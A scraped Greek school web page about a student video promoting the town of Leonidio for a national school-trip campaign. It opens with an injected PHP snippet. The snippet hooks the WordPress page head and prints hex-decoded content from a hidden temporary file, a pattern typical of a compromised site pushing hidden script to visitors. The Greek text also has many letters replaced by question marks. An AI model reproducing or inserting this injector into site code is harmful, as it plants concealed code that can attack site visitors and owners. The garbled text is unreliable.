if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Αγαπώ και προβάλλω τον τόπο μου, Λεωνίδιο |

Αγαπώ και προβάλλω τον τόπο μου, Λεωνίδιο

Για την προβολή και προώθηση της Ελλάδας ως τόπο προορισ?ού σχολικών εκδρο?ών τόσο για τα σχολεία της χώρας, όσο και για σχολεία του εξωτερικού, ?ε πρωτοβουλία του Υπουργείου Παιδείας, δη?ιουργήθηκε μία ψηφιακή διαδραστική πλατφόρ?α ?ε το ενδεικτικό σύνθη?α «?Πά?ε Ελλάδα?/Schools, let?s go to Greece», και ξεκίνησε ?ια πανελλαδική κα?πάνια, ?ε τίτλο: «Αγαπώ και προβάλλω τον τόπο ?ου». Σε αυτή την προσπάθεια συμμετέχει και το σχολείο μας με το παρακάτω video συμβάλλοντας έτσι με αυτό τον τρόπο στην προβολλή του όμορφου τόπου μας, το Λεωνίδιο.
Η αρχιτεκτονική των σπιτιών, ο κοκκινόβραχος, η ήρεμη μα και συνάμα δυναμική και άγρια όμορφια του τόπου, οι άνθρωποι και οι ζωές τους είναι μερικά από τα στοιχεία εκείνα που συνθέτουν μια εικόνα μοναδική.